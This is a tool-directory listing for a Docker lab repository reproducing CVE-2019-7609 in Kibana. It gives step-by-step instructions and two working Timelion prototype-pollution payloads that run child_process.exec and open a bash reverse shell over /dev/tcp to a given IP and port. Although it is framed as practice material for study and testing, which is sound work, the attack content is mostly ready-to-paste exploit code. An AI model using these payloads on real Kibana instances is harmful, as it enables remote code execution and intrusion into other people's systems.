Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-7609 — docker lab setup for kibana-7609 | Kitploit
Tools/GitHubGitHub/wolf1892/cve-2019-7609
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubwolf1892/cve-2019-7609

CVE-2019-7609

docker lab setup for kibana-7609

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-7609

docker lab setup for kibana-7609

Reference : https://github.com/mpgn/CVE-2019-7609

root@kitploit:~
Open Kibana
Past one of the following payload into the Timelion visualizer
Click run
On the left panel click on Canvas
Your reverse shell should pop ! :)

payload by @securityMB

.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')

root@kitploit:~
payload by @chybeta

.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1'");//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')

Download Tool